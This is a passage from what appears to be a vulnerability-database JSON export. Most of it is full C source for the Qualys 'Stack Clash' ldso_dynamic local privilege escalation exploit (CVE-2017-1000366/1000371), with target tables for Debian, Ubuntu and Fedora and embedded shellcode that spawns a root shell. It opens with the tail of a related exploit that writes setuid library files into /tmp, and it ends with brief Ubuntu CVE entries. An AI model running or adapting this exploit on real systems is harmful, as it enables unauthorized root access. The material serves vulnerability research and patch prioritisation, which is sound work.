%zu\\n\", ldas, pads, padl);\n }\n\n {\n char * cp = mempcpy(llp, LLP, sizeof(LLP)-1);\n memset(cp, '/', MAX_GWR);\n memcpy(cp + MAX_GWR, SEP_LIB, sizeof(SEP_LIB)-1);\n if (*(cp + MAX_GWR + sizeof(SEP_LIB)-1)) die();\n\n #define LIB_TO_TMP \"/../tmp/\"\n if (sizeof(LIB_TO_TMP)-1 != MALLOC_ALIGN) die();\n\n if (!best.gwr) die();\n if (best.gwr >= MAX_GWR) die();\n if (best.gwr % MALLOC_ALIGN) die();\n size_t i;\n for (i = 0; i < best.gwr / MALLOC_ALIGN; i++) {\n cp = mempcpy(cp, LIB_TO_TMP, MALLOC_ALIGN);\n }\n if (!best.cnt) die();\n if (best.dst >= sizeof(DSTs)/sizeof(*DSTs)) die();\n for (i = 0; i < best.cnt; i++) {\n *cp++ = '$';\n cp = mempcpy(cp, DSTs[best.dst].str, DSTs[best.dst].len);\n *cp++ = '/';\n }\n if (cp >= llp + sizeof(llp)) die();\n if (llp[sizeof(llp)-1]) die();\n }\n\n #define LHCM \"LD_HWCAP_MASK=\"\n static char lhcm[64];\n if ((unsigned int)snprintf(lhcm, sizeof(lhcm), \"%s%lu\", LHCM, best.ihc.hwcap_mask)\n >= sizeof(lhcm)) die();\n {\n char * cp = mempcpy(lda, LDA, sizeof(LDA)-1);\n size_t i;\n for (i = 0; i < MAX_RLDAS; i++) {\n cp = mempcpy(cp, REL_LA \":\", sizeof(REL_LA));\n }\n if (cp >= lda + sizeof(lda)) die();\n if (*cp) die();\n }\n static char rlda[MAX_ARG_STRLEN];\n\n const size_t args = 1 + pads + 1;\n char ** const argv = calloc(args, sizeof(char *));\n if (!argv) die();\n {\n char ** ap = argv;\n *ap++ = (char *)binary;\n size_t i;\n for (i = 0; i < pads; i++) {\n *ap++ = pad;\n }\n *ap++ = NULL;\n if (ap != argv + args) die();\n }\n\n const size_t envs = 2 + ldas + 2;\n char ** const envp = calloc(envs, sizeof(char *));\n if (!envp) die();\n {\n char ** ep = envp;\n *ep++ = llp;\n *ep++ = lhcm;\n size_t i;\n for (i = 0; i < ldas; i++) {\n *ep++ = lda;\n }\n *ep++ = rlda;\n *ep++ = NULL;\n if (ep != envp + envs) die();\n }\n\n {\n static const struct rlimit rlimit_stack = { RLIM_INFINITY, RLIM_INFINITY };\n if (setrlimit(RLIMIT_STACK, &rlimit_stack)) die();\n }\n int pipefd[2];\n if (pipe(pipefd)) die();\n if (close(pipefd[0])) die();\n pipefd[0] = -1;\n if (signal(SIGPIPE, SIG_DFL) == SIG_ERR) die();\n\n {\n #define ABS_LA_DIR \"/\" LIB \"/\" LIB_TO_TMP \"/\"\n static const char * const abs_las[] = {\n ABS_LA_DIR \"\" REL_LA,\n ABS_LA_DIR \"/\" REL_LA,\n ABS_LA_DIR \"/.\" REL_LA,\n ABS_LA_DIR \"/..\" REL_LA,\n };\n size_t i;\n for (i = 0; i < sizeof(abs_las)/sizeof(*abs_las); i++) {\n const int fd = open(abs_las[i], O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0);\n if (fd <= -1) die();\n {\n struct stat st;\n if (fstat(fd, &st)) die();\n if (!S_ISREG(st.st_mode)) die();\n if (st.st_uid != getuid()) die();\n if (st.st_uid != geteuid()) die();\n }\n {\n static const\n #include \"la.so.h\"\n if (sizeof(la_so) != la_so_len) die();\n if (write(fd, la_so, sizeof(la_so)) != (ssize_t)sizeof(la_so)) die();\n }\n if (fchmod(fd, 04755)) die();\n if (close(fd)) die();\n }\n }\n\n size_t try;\n for (try = 1; try <= 65536; try++) {\n {\n char * cp = mempcpy(rlda, LDA, sizeof(LDA)-1);\n size_t rldas = 1 + random() % (65536 / sizeof(struct audit_list));\n if (rldas > MAX_RLDAS) die();\n if (rldas <= 0) die();\n while (rldas--) {\n cp = mempcpy(cp, REL_LA \":\", sizeof(REL_LA));\n }\n if (cp >= rlda + sizeof(rlda)) die();\n *cp = '\\0';\n }\n if (fflush(stdout)) die();\n const pid_t pid = fork();\n if (pid <= -1) die();\n if (pid == 0) {\n if (dup2(pipefd[1], 1) != 1) die();\n if (dup2(pipefd[1], 2) != 2) die();\n execve(*argv, argv, envp);\n die();\n }\n int status = 0;\n struct timeval start, stop, diff;\n if (gettimeofday(&start, NULL)) die();\n if (waitpid(pid, &status, WUNTRACED) != pid) die();\n if (gettimeofday(&stop, NULL)) die();\n timersub(&stop, &start, &diff);\n printf(\"try %zu %ld.%06ld \", try, diff.tv_sec, diff.tv_usec);\n\n if (WIFSIGNALED(status)) {\n printf(\"signal %d\\n\", WTERMSIG(status));\n switch (WTERMSIG(status)) {\n case SIGPIPE:\n case SIGSEGV:\n case SIGBUS:\n break;\n default:\n die();\n }\n } else if (WIFEXITED(status)) {\n printf(\"exited %d\\n\", WEXITSTATUS(status));\n die();\n } else if (WIFSTOPPED(status)) {\n printf(\"stopped %d\\n\", WSTOPSIG(status));\n die();\n } else {\n printf(\"unknown %d\\n\", status);\n die();\n }\n }\n die();\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel (Debian 910 Ubuntu 14.04.516.04.217.04 Fedora 232425) - ldso_dynamic Stack Clash Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-28T00:00:00", "type": "exploitpack", "title": "Linux Kernel (Debian 910 Ubuntu 14.04.516.04.217.04 Fedora 232425) - ldso_dynamic Stack Clash Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000366", "CVE-2017-1000371"], "modified": "2017-06-28T00:00:00", "id": "EXPLOITPACK:7C30F59E9F9E9C7EFCD4805D95AF6006", "href": "", "sourceData": "/*\n * Linux_ldso_dynamic.c for CVE-2017-1000366, CVE-2017-1000371\n * Copyright (C) 2017 Qualys, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see <http://www.gnu.org/licenses/>.\n */\n\n#define _GNU_SOURCE\n#include <elf.h>\n#include <fcntl.h>\n#include <limits.h>\n#include <link.h>\n#include <signal.h>\n#include <stddef.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/param.h>\n#include <sys/resource.h>\n#include <sys/stat.h>\n#include <sys/time.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n\n#define PAGESZ ((size_t)4096)\n#define ALIGN ((size_t)16)\n\n#define PIE_BASE ((uintptr_t)0x80000000)\n#define PIE_RAND ((size_t)1<<20)\n\n#define STACK_BASE ((uintptr_t)0xC0000000)\n#define STACK_RAND ((size_t)8<<20)\n\n#define MAX_ARG_STRLEN ((size_t)128<<10)\n\nstatic const struct target * target;\nstatic const struct target {\n const char * name;\n const char * repl_lib;\n} targets[] = {\n {\n .name = \"Debian 9 (stretch)\",\n .repl_lib = \"lib/i386-linux-gnu\",\n },\n {\n .name = \"Debian 10 (buster)\",\n .repl_lib = \"lib/i386-linux-gnu\",\n },\n {\n .name = \"Ubuntu 14.04.5 (Trusty Tahr)\",\n .repl_lib = \"lib/i386-linux-gnu\",\n },\n {\n .name = \"Ubuntu 16.04.2 (Xenial Xerus)\",\n .repl_lib = \"lib/i386-linux-gnu\",\n },\n {\n .name = \"Ubuntu 17.04 (Zesty Zapus)\",\n .repl_lib = \"lib/i386-linux-gnu\",\n },\n {\n .name = \"Fedora 23 (Server Edition)\",\n .repl_lib = \"lib\",\n },\n {\n .name = \"Fedora 24 (Server Edition)\",\n .repl_lib = \"lib\",\n },\n {\n .name = \"Fedora 25 (Server Edition)\",\n .repl_lib = \"lib\",\n },\n};\n\n#define die() do { \\\n printf(\"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\nstatic const ElfW(auxv_t) * my_auxv;\n\nstatic unsigned long int\nmy_getauxval (const unsigned long int type)\n{\n const ElfW(auxv_t) * p;\n\n if (!my_auxv) die();\n for (p = my_auxv; p->a_type != AT_NULL; p++)\n if (p->a_type == type)\n return p->a_un.a_val;\n die();\n}\n\nstruct elf_info {\n uintptr_t map_start, map_end;\n uintptr_t dyn_start, dyn_end;\n};\n\nstatic struct elf_info\nget_elf_info(const char * const binary)\n{\n static struct elf_info elf;\n const int fd = open(binary, O_RDONLY | O_NOFOLLOW);\n if (fd <= -1) die();\n struct stat st;\n if (fstat(fd, &st)) die();\n if (!S_ISREG(st.st_mode)) die();\n if (st.st_size <= 0) die();\n #define SAFESZ ((size_t)64<<20)\n if (st.st_size >= (ssize_t)SAFESZ) die();\n const size_t size = st.st_size;\n uint8_t * const buf = malloc(size);\n if (!buf) die();\n if (read(fd, buf, size) != (ssize_t)size) die();\n if (close(fd)) die();\n\n if (size <= sizeof(ElfW(Ehdr))) die();\n const ElfW(Ehdr) * const ehdr = (const ElfW(Ehdr) *)buf;\n if (ehdr->e_ident[EI_MAG0] != ELFMAG0) die();\n if (ehdr->e_ident[EI_MAG1] != ELFMAG1) die();\n if (ehdr->e_ident[EI_MAG2] != ELFMAG2) die();\n if (ehdr->e_ident[EI_MAG3] != ELFMAG3) die();\n if (ehdr->e_ident[EI_CLASS] != ELFCLASS32) die();\n if (ehdr->e_ident[EI_DATA] != ELFDATA2LSB) die();\n if (ehdr->e_type != ET_DYN) die();\n if (ehdr->e_machine != EM_386) die();\n if (ehdr->e_version != EV_CURRENT) die();\n if (ehdr->e_ehsize != sizeof(ElfW(Ehdr))) die();\n if (ehdr->e_phentsize != sizeof(ElfW(Phdr))) die();\n if (ehdr->e_shentsize != sizeof(ElfW(Shdr))) die();\n if (ehdr->e_phoff <= 0 || ehdr->e_phoff >= size) die();\n if (ehdr->e_shoff <= 0 || ehdr->e_shoff >= size) die();\n if (ehdr->e_phnum > (size - ehdr->e_phoff) / sizeof(ElfW(Phdr))) die();\n if (ehdr->e_shnum > (size - ehdr->e_shoff) / sizeof(ElfW(Shdr))) die();\n\n unsigned int i;\n {\n int interp = 0;\n for (i = 0; i < ehdr->e_phnum; i++) {\n const ElfW(Phdr) * const phdr = (const ElfW(Phdr) *)(buf + ehdr->e_phoff) + i;\n if (phdr->p_type == PT_INTERP) interp = 1;\n if (phdr->p_type != PT_LOAD) continue;\n if (elf.map_start) die();\n\n if (phdr->p_offset >= size) die();\n if (phdr->p_filesz > size - phdr->p_offset) die();\n if (phdr->p_filesz > phdr->p_memsz) die();\n if (phdr->p_vaddr != phdr->p_paddr) die();\n if (phdr->p_vaddr >= SAFESZ) die();\n if (phdr->p_memsz >= SAFESZ) die();\n if (phdr->p_memsz <= 0) die();\n if (phdr->p_align != PAGESZ) die();\n\n switch (phdr->p_flags) {\n case PF_R | PF_X:\n if (phdr->p_vaddr) die();\n break;\n case PF_R | PF_W:\n elf.map_start = phdr->p_vaddr & ~(PAGESZ-1);\n elf.map_end = (phdr->p_vaddr + phdr->p_memsz + PAGESZ-1) & ~(PAGESZ-1);\n if (!elf.map_start) die();\n break;\n default:\n die();\n }\n }\n if (!interp) die();\n if (!elf.map_start) die();\n }\n for (i = 0; i < ehdr->e_shnum; i++) {\n const ElfW(Shdr) * const shdr = (const ElfW(Shdr) *)(buf + ehdr->e_shoff) + i;\n if (!(shdr->sh_flags & SHF_ALLOC)) continue;\n if (shdr->sh_size <= 0) die();\n if (shdr->sh_size >= SAFESZ) die();\n if (shdr->sh_addr >= SAFESZ) die();\n #undef SAFESZ\n const uintptr_t start = shdr->sh_addr;\n const uintptr_t end = start + shdr->sh_size;\n\n if (!(shdr->sh_flags & SHF_WRITE)) {\n if (start < elf.map_end && end > elf.map_start) die();\n continue;\n }\n if (start < elf.map_start || end > elf.map_end) die();\n if (shdr->sh_type != SHT_DYNAMIC) continue;\n if (shdr->sh_entsize != sizeof(ElfW(Dyn))) die();\n\n if (elf.dyn_start) die();\n elf.dyn_start = start;\n elf.dyn_end = end;\n if (!elf.dyn_start) die();\n }\n if (!elf.dyn_start) die();\n free(buf);\n return elf;\n}\n\nstatic void\ncreate_needed_lib(const char * const needed)\n{\n static struct lib {\n union {\n struct {\n ElfW(Ehdr) e;\n ElfW(Phdr) p1;\n ElfW(Phdr) p2;\n ElfW(Phdr) p3;\n } h;\n char align[PAGESZ];\n } u;\n char code1[PAGESZ];\n char code3[PAGESZ];\n char code2[8<<20];\n } lib = { .u = { .h = {\n .e = {\n .e_ident = {\n ELFMAG0,\n ELFMAG1,\n ELFMAG2,\n ELFMAG3,\n ELFCLASS32,\n ELFDATA2LSB,\n EV_CURRENT,\n ELFOSABI_SYSV,\n 0\n },\n .e_type = ET_DYN,\n .e_machine = EM_386,\n .e_version = EV_CURRENT,\n .e_phoff = offsetof(struct lib, u.h.p1),\n .e_ehsize = sizeof(ElfW(Ehdr)),\n .e_phentsize = sizeof(ElfW(Phdr)),\n .e_phnum = 3\n },\n .p1 = {\n .p_type = PT_LOAD,\n .p_offset = offsetof(struct lib, code1),\n .p_vaddr = 0,\n .p_filesz = sizeof(lib.code1),\n .p_memsz = sizeof(lib.code1),\n .p_flags = PF_R | PF_X,\n .p_align = PAGESZ\n },\n .p2 = {\n .p_type = PT_LOAD,\n .p_offset = offsetof(struct lib, code2),\n .p_vaddr = -(sizeof(lib.code2) + PAGESZ),\n .p_filesz = sizeof(lib.code2),\n .p_memsz = sizeof(lib.code2),\n .p_flags = PF_R | PF_X,\n .p_align = PAGESZ\n },\n .p3 = {\n .p_type = PT_LOAD,\n .p_offset = offsetof(struct lib, code3),\n .p_vaddr = sizeof(lib.code1),\n .p_filesz = sizeof(lib.code3),\n .p_memsz = sizeof(lib.code3),\n .p_flags = PF_R | PF_X,\n .p_align = PAGESZ\n }\n }}};\n\n static const char shellcode[] =\n \"\\x83\\xc4\\x40\\xb8\\x17\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\xcd\\x80\\xb8\"\n \"\\x2e\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\xcd\\x80\\xb8\\x3f\\x00\\x00\\x00\"\n \"\\xbb\\x00\\x00\\x00\\x00\\xb9\\x01\\x00\\x00\\x00\\xcd\\x80\\xb8\\x3f\\x00\\x00\"\n \"\\x00\\xbb\\x00\\x00\\x00\\x00\\xb9\\x02\\x00\\x00\\x00\\xcd\\x80\\xb8\\x0b\\x00\"\n \"\\x00\\x00\\x68\\x2f\\x73\\x68\\x00\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xba\\x00\"\n \"\\x00\\x00\\x00\\x52\\x53\\x89\\xe1\\xcd\\x80\\xb8\\x01\\x00\\x00\\x00\\xbb\\x00\"\n \"\\x00\\x00\\x00\\xcd\\x80\";\n\n memset(lib.code2, 0x90, sizeof(lib.code2));\n if (sizeof(lib.code2) <= sizeof(shellcode)) die();\n memcpy(lib.code2 + sizeof(lib.code2) - sizeof(shellcode), shellcode, sizeof(shellcode));\n\n const int fd = open(needed, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0);\n if (fd <= -1) die();\n if (write(fd, &lib, sizeof(lib)) != (ssize_t)sizeof(lib)) die();\n if (fchmod(fd, 0755)) die();\n if (close(fd)) die();\n}\n\nstatic const char my_x86_platforms[4][5] = {\n \"i386\", \"i486\", \"i586\", \"i686\"\n};\n\nint\nmain(const int my_argc, const char * const my_argv[], const char * const my_envp[])\n{\n {\n const char * const * p = my_envp;\n while (*p++) ;\n my_auxv = (const void *)p;\n }\n if (my_getauxval(AT_PAGESZ) != PAGESZ) die();\n\n if (my_argc != 1+2) {\n printf(\"Usage: %s target binary\\n\", my_argv[0]);\n size_t i;\n for (i = 0; i < sizeof(targets)/sizeof(*targets); i++) {\n printf(\"Target %zu %s\\n\", i, targets[i].name);\n }\n die();\n }\n {\n const size_t i = strtoul(my_argv[1], NULL, 10);\n if (i >= sizeof(targets)/sizeof(*targets)) die();\n target = targets + i;\n printf(\"Target %zu %s\\n\", i, target->name);\n }\n const char * const binary = realpath(my_argv[2], NULL);\n if (!binary) die();\n if (*binary != '/') die();\n if (access(binary, R_OK | X_OK)) die();\n\n const struct elf_info elf = get_elf_info(binary);\n printf(\"map_start -> dyn_end = %u\\n\", elf.dyn_end - elf.map_start);\n printf(\"dyn_start -> dyn_end = %u\\n\", elf.dyn_end - elf.dyn_start);\n printf(\"dyn_start -> map_end = %u\\n\", elf.map_end - elf.dyn_start);\n printf(\"dyn_end -> map_end = %u\\n\", elf.map_end - elf.dyn_end);\n\n const char * const slash = strrchr(binary, '/');\n if (!slash) die();\n if (slash <= binary) die();\n const char * const origin = strndup(binary, slash - binary);\n if (!origin) die();\n printf(\"origin %s (%zu)\\n\", origin, strlen(origin));\n\n const char * const platform = (const void *)my_getauxval(AT_PLATFORM);\n if (!platform) die();\n const size_t platform_len = strlen(platform);\n if (platform_len != 4) die();\n {\n size_t i;\n for (i = 0; ; i++) {\n if (i >= sizeof(my_x86_platforms) / sizeof(my_x86_platforms[0])) die();\n if (strcmp(platform, my_x86_platforms[i]) == 0) break;\n }\n }\n const struct {\n const char * str;\n size_t len;\n size_t repl_len;\n } DSTs[] = {\n #define DST_LIB \"LIB\"\n { DST_LIB, strlen(DST_LIB), strlen(target->repl_lib) },\n #define DST_PLATFORM \"PLATFORM\"\n { DST_PLATFORM, strlen(DST_PLATFORM), platform_len }\n };\n size_t repl_max = strlen(origin);\n {\n size_t i;\n for (i = 0; i < sizeof(DSTs)/sizeof(*DSTs); i++) {\n if (repl_max < DSTs[i].repl_len)\n repl_max = DSTs[i].repl_len;\n }\n }\n printf(\"repl_max %zu\\n\", repl_max);\n if (repl_max < 4) die();\n\n static struct {\n double probability;\n size_t len, gwr, cnt, dst;\n } best;\n\n #define LLP \"LD_LIBRARY_PATH=\"\n static char llp[MAX_ARG_STRLEN];\n #define MAX_GWR (sizeof(llp) - sizeof(LLP))\n {\n size_t len;\n for (len = MAX_GWR; len >= ALIGN; len -= ALIGN) {\n size_t gwr;\n for (gwr = len; gwr >= elf.dyn_end - elf.dyn_start; gwr--) {\n size_t dst;\n for (dst = 0; dst < sizeof(DSTs)/sizeof(*DSTs); dst++) {\n const size_t cnt = (len - gwr) / (1 + DSTs[dst].len + 1);\n const size_t gpj = (len + ((repl_max > 4) ? (cnt * (repl_max - 4)) : 0) + 1 + (ALIGN-1)) & ~(ALIGN-1);\n const size_t bwr = cnt * (DSTs[dst].repl_len + 1) + ((len - gwr) - cnt * (1 + DSTs[dst].len + 1)) + 1;\n\n if (gwr + bwr >= elf.map_end - elf.dyn_start) continue;\n const size_t min = MIN(gwr, elf.dyn_end - elf.map_start);\n if (gpj <= min + (elf.map_end - elf.dyn_end) + 3 * PAGESZ) continue;\n\n const double probability = (double)min / (double)(PIE_RAND + STACK_RAND);\n if (best.probability < probability) {\n best.probability = probability;\n best.len = len;\n best.gwr = gwr;\n best.cnt = cnt;\n best.dst = dst;\n printf(\"len %zu gpj %zu gwr %zu bwr %zu cnt %zu dst %zu repl %zu probability 1/%zu (%.10g)\\n\",\n len, gpj, gwr, bwr, cnt, DSTs[dst].len, DSTs[dst].repl_len, (size_t)(1 / probability), probability);\n }\n }\n }\n }\n }\n if (!best.probability) die();\n if (STACK_BASE <= PIE_BASE) die();\n const size_t stack_size = (STACK_BASE - PIE_BASE) - (PIE_RAND/2 + elf.map_end + STACK_RAND/2);\n printf(\"stack_size %zu\\n\", stack_size);\n\n #define STRTAB_SIZE (2 * STACK_RAND)\n #define NEEDED \"./3456789abcdef\"\n if (sizeof(NEEDED) != ALIGN) die();\n static union {\n uintptr_t p;\n char s[sizeof(void *)];\n } strtab_addr;\n {\n static const ElfW(Dyn) dyn;\n if (sizeof(strtab_addr) != sizeof(dyn.d_un)) die();\n if (sizeof(strtab_addr.p) != sizeof(dyn.d_un)) die();\n if (sizeof(strtab_addr.s) != sizeof(dyn.d_un)) die();\n }\n {\n uintptr_t needed_addr = STACK_BASE - STACK_RAND/2 - STRTAB_SIZE/2;\n const uintptr_t first_needed_addr = needed_addr;\n for (;; needed_addr += sizeof(NEEDED)) {\n if (needed_addr % sizeof(NEEDED)) die();\n strtab_addr.p = needed_addr / 2;\n size_t i;\n for (i = 0; i < sizeof(strtab_addr.s); i++) {\n if (strchr(\"$:;\\\\\", strtab_addr.s[i])) {\n if (i >= 3) die();\n break;\n }\n }\n if (i >= sizeof(strtab_addr.s)) break;\n }\n printf(\"needed %08x -> %08x (first %08x -> %08x)\\n\",\n needed_addr, strtab_addr.p, first_needed_addr,\n needed_addr - first_needed_addr);\n if (needed_addr < first_needed_addr) die();\n if (needed_addr - first_needed_addr >= STACK_RAND / 4) die();\n }\n #define INITIAL_STACK_EXPANSION (131072UL)\n const size_t needed_envs = STRTAB_SIZE / sizeof(NEEDED);\n if (needed_envs < INITIAL_STACK_EXPANSION / sizeof(char *)) die();\n\n static char clash[MAX_ARG_STRLEN];\n memset(clash, ' ', sizeof(clash)-1);\n if ((strlen(clash) + 1) % ALIGN) die();\n const size_t clash_envs = (stack_size - sizeof(llp) - needed_envs * (sizeof(char *) + sizeof(NEEDED)))\n / (sizeof(char *) + sizeof(clash));\n printf(\"#needed %zu #clash %zu\\n\", needed_envs, clash_envs);\n\n {\n char * cp = mempcpy(llp, LLP, sizeof(LLP)-1);\n memset(cp, '/', best.len);\n const char * const bwrp = cp + best.gwr;\n cp += elf.dyn_start % ALIGN;\n if (cp >= bwrp) die();\n {\n static const ElfW(Dyn) dyn;\n for (; bwrp - cp >= (ptrdiff_t)sizeof(dyn); cp += sizeof(dyn)) {\n ElfW(Dyn) * const dynp = (void *)cp;\n dynp->d_tag = DT_AUXILIARY;\n dynp->d_un.d_ptr = strtab_addr.p;\n }\n }\n if (cp > bwrp) die();\n cp = (char *)bwrp;\n if (!best.cnt) die();\n if (best.dst >= sizeof(DSTs)/sizeof(*DSTs)) die();\n size_t i;\n for (i = 0; i < best.cnt; i++) {\n *cp++ = '$';\n cp = mempcpy(cp, DSTs[best.dst].str, DSTs[best.dst].len);\n *cp++ = '/';\n }\n if (cp >= llp + sizeof(llp)) die();\n if ((strlen(llp) + 1) % ALIGN) die();\n if ((strlen(llp) + 1) != sizeof(LLP) + best.len) die();\n }\n\n #define LHCM \"LD_HWCAP_MASK=\"\n static char lhcm[64];\n {\n const int width = ALIGN - (sizeof(LHCM) + strlen(binary) + 1 + sizeof(void *)) % ALIGN;\n if (width <= 0) die();\n if ((unsigned int)width > ALIGN) die();\n if ((unsigned int)snprintf(lhcm, sizeof(lhcm), \"%s%0*u\", LHCM, width, 0)\n >= sizeof(lhcm)) die();\n if (strlen(lhcm) + 1 != sizeof(LHCM) + width) die();\n }\n\n const size_t args = 2 + clash_envs + needed_envs + 1;\n char ** const argv = calloc(args, sizeof(char *));\n if (!argv) die();\n {\n char ** ap = argv;\n *ap++ = (char *)binary;\n *ap++ = \"--help\";\n size_t i;\n for (i = 0; i < clash_envs; i++) {\n *ap++ = clash;\n }\n for (i = 0; i < needed_envs; i++) {\n *ap++ = NEEDED;\n }\n *ap++ = NULL;\n if (ap != argv + args) die();\n }\n\n const size_t envs = 1 + 2;\n char ** const envp = calloc(envs, sizeof(char *));\n if (!envp) die();\n {\n char ** ep = envp;\n *ep++ = llp;\n *ep++ = lhcm;\n *ep++ = NULL;\n if (ep != envp + envs) die();\n }\n\n {\n static const struct rlimit rlimit_stack = { RLIM_INFINITY, RLIM_INFINITY };\n if (setrlimit(RLIMIT_STACK, &rlimit_stack)) die();\n }\n int pipefd[2];\n if (pipe(pipefd)) die();\n if (close(pipefd[0])) die();\n pipefd[0] = -1;\n if (signal(SIGPIPE, SIG_DFL) == SIG_ERR) die();\n\n create_needed_lib(NEEDED);\n\n size_t try;\n for (try = 1; try <= 65536; try++) {\n if (fflush(stdout)) die();\n const pid_t pid = fork();\n if (pid <= -1) die();\n if (pid == 0) {\n if (dup2(pipefd[1], 1) != 1) die();\n if (dup2(pipefd[1], 2) != 2) die();\n execve(*argv, argv, envp);\n die();\n }\n int status = 0;\n struct timeval start, stop, diff;\n if (gettimeofday(&start, NULL)) die();\n if (waitpid(pid, &status, WUNTRACED) != pid) die();\n if (gettimeofday(&stop, NULL)) die();\n timersub(&stop, &start, &diff);\n printf(\"try %zu %ld.%06ld \", try, diff.tv_sec, diff.tv_usec);\n\n if (WIFSIGNALED(status)) {\n printf(\"signal %d\\n\", WTERMSIG(status));\n switch (WTERMSIG(status)) {\n case SIGPIPE:\n case SIGSEGV:\n case SIGBUS:\n break;\n default:\n die();\n }\n } else if (WIFEXITED(status)) {\n printf(\"exited %d\\n\", WEXITSTATUS(status));\n } else if (WIFSTOPPED(status)) {\n printf(\"stopped %d\\n\", WSTOPSIG(status));\n die();\n } else {\n printf(\"unknown %d\\n\", status);\n die();\n }\n }\n die();\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-06-07T14:33:18", "description": "The offset2lib patch as used in the Linux Kernel contains a vulnerability\nthat allows a PIE binary to be execve()'ed with 1GB of arguments or\nenvironmental strings then the stack occupies the address 0x80000000 and\nthe PIE binary is mapped above 0x40000000 nullifying the protection of the\noffset2lib patch. This affects Linux Kernel version 4.11.5 and earlier.\nThis is a different issue than CVE-2017-1000371. This issue appears to be\nlimited to i386 based systems.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | The original offset2lib issue was not assigned a CVE and the fix is only in 15.04 (Vivid) and newer kernels.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2017-1000370", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2017-06-19T00:00:00", "id": "UB:CVE-2017-1000370", "href": "https://ubuntu.com/security/CVE-2017-1000370", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T15:04:51", "description": "Yann Collet LZ4 before r119, when used on certain 32-bit platforms that\nallocate memory beyond 0x80000000, does not properly detect integer\noverflows, which allows context-dependent attackers to cause a denial of\nservice (memory corruption) or possibly have unspecified other impact via a\ncrafted Literal Run, a different vulnerability than CVE-2014-4611.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | code in grub2 is different, no indication it is vulnerable to the same issue. Marking as not-affected.\n", "cvss3": {}, "published": "2014-07-03T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4715", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4611", "CVE-2014-4715"], "modified": "2014-07-03T00:00:00", "id": "UB:CVE-2014-4715", "href": "https://ubuntu.com/security/CVE-2014-4715", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T15:04:55", "description": "Integer overflow in the LZ4 algorithm implementation, as used in Yann\nCollet LZ4 before r118 and in the lz4_uncompress function 